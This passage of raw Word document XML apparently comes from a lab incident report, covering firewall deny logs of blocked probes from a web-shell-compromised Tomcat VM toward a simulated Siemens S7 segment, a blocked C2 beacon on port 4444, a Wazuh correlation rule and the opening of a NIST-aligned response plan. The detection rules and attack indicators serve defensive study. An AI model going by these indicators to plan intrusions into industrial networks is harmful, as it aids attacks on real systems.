            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Dest Port    : 4444  (Metasploit handler / netcat default C2 port)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Protocol     : TCP  |  Flags: SYN</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Packets Dropped : 3 SYN attempts</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Kill States     : ENABLED — existing TCP states from 192.168.100.10:4444 terminated</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Block Duration  : 3600 seconds (pfSense block table auto-expiry)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="569CD6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">---</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">EVE JSON Output : Forwarded to Wazuh SIEM via syslog UDP/514</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Wazuh Alert     : Rule 100445 — CRITICAL L12 — C2 beacon blocked</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Wazuh Corr.     : Rule 100441 — multi-source match CONFIRMED (Snort+Suricata+pfSense)</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5.6 Log Evidence — pfSense Firewall: OT Boundary Probe Blocked</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="90" w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">The following pfSense firewall deny log confirms that the attacker's probe of the OT-equivalent network segment was blocked by the inter-segment deny rule. This is the most critical containment log — confirming the simulated OT segment was not breached.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569CD6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">=== PFSENSE FIREWALL DENY LOG — LAN Interface ========================</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Rule     : DENY-TOMCAT-TO-OT-EQUIV  (pfSense LAN ruleset — deny-all to OT alias)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="569CD6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">---</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"># OT Boundary Probe Attempt #1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Timestamp      : 2026-03-18T02:40:51.003Z</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Source IP      : 192.168.100.10  (Apache Tomcat VM — attacker-controlled via web shell)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Source Port    : 51847</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Dest IP        : 192.168.100.80  (OT-equiv alias — simulated Siemens MES gateway)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Dest Port      : 102             (S7 Communication — Siemens S7 PLC protocol)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Protocol       : TCP  |  Flags: SYN</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Action         : DENY  |  Bytes: 60</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Rule Name      : DENY-TOMCAT-TO-OT-EQUIV</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="569CD6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">---</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"># OT Boundary Probe Attempt #2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Timestamp      : 2026-03-18T02:40:51.441Z</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Source IP      : 192.168.100.10</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Dest IP        : 192.168.100.81  (OT-equiv alias — secondary host)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Dest Port      : 102</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Action         : DENY  |  Bytes: 60</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="569CD6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">---</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"># OT Boundary Probe Attempt #3</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Timestamp      : 2026-03-18T02:40:52.119Z</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Source IP      : 192.168.100.10</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Dest IP        : 192.168.100.82  (OT-equiv alias — subnet sweep)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Dest Port      : 102</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Action         : DENY  |  Bytes: 60</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="569CD6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">---</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">WAZUH ALERT    : Rule 100444 — CRITICAL L12 — OT boundary probe</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">SURICATA ALERT : SID 9100004 REJECT — Unauthorized port access to OT-equiv segment</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">SOC ACTION     : L12 alert email sent to analyst at 02:41:07 UTC</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5.7 Wazuh Correlation — Multi-Source Incident Confirmation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="90" w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">The following Wazuh correlation rule logic and query result documents the multi-source match that generated the P1 incident — combining Snort, Suricata, and pfSense deny events against the same source IP into a single Level 12 Critical alert.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6A9955"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"># Wazuh Manager — Custom Correlation Rule (rules/local_rules.xml)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"># Rule 100441  |  Triggered: 2026-03-18T02:41:07Z</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4F1C0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4F1C0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;rule id='100441' level='12'&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4F1C0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;if_matched_sid&gt;100001&lt;/if_matched_sid&gt;   &lt;!-- Snort port scan SID 9000001 --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4F1C0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;if_matched_sid&gt;100002&lt;/if_matched_sid&gt;   &lt;!-- Suricata IPS drop SID 9100001 --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4F1C0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;if_matched_sid&gt;100003&lt;/if_matched_sid&gt;   &lt;!-- pfSense firewall deny event --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4F1C0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;same_source_ip /&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4F1C0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;timeframe&gt;60&lt;/timeframe&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4F1C0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;description&gt;COLLINS-LAB: Multi-source port scan confirmed — Snort+Suricata+pfSense on same IP&lt;/description&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4F1C0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;group&gt;recon,port_scan,high_severity&lt;/group&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4F1C0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;/rule&gt;</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Result: 3-source correlation match — all three tools flagged 192.168.100.50</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"># Wazuh alert generated: Level 12 Critical — email notification to analyst</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"># Active Response: iptables block applied to Tomcat agent (192.168.100.10)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">#                  blocking further inbound from 192.168.100.50 at host level</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6. Incident Response — Step-by-Step</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="90" w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">The lab incident response process is executed in alignment with NIST SP 800-61r2 (Computer Security Incident Handling Guide) and ISO/IEC 27035, adapted to the open-source lab toolchain. The response is structured in four phases: Preparation, Detection and Analysis, Containment / Eradication / Recovery, and Post-Incident Activity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1 Phase 1 — Preparation (Pre-Incident State)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="90" w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">The following controls were in place prior to the incident, enabling effective detection and response:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Wazuh correlation rules 100441–100445 active and tuned against two-week baseline of normal lab traffic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Snort IDS custom ruleset (collins-lab.rules) active on pfSense LAN interface in passive detection mode — alert stream flowing to Wazuh.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Suricata IPS (collins-ips.rules) active on pfSense LAN interface in Legacy inline blocking mode — ET Open + custom rules loaded.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">pfSense firewall rule DENY-TOMCAT-TO-OT-EQUIV active on LAN interface — deny-all from 192.168.100.10 to OT-equiv alias 192.168.100.80/28.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Wazuh active response module configured — iptables block applied automatically on Tomcat agent when L12 alert fires on inbound attacker IP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">VM snapshots taken for all four VMs at clean baseline state before exercise — restoration path confirmed tested.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab IR playbook documented: isolation via pfSense block alias, WAR removal via Tomcat Manager, credential reset, snapshot restore.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6.2 Phase 2 — Detection and Analysis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STEP 1 — Initial Alert Triage  |  02:41–02:50 UTC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
